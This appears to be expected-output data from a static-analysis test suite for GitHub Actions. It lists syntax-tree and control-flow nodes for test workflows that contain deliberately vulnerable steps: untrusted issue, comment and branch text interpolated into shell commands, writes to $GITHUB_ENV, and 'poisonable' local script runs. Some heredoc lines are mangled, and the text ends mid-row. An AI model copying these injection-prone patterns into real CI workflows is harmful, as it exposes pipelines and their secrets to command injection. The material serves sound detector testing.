.github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| 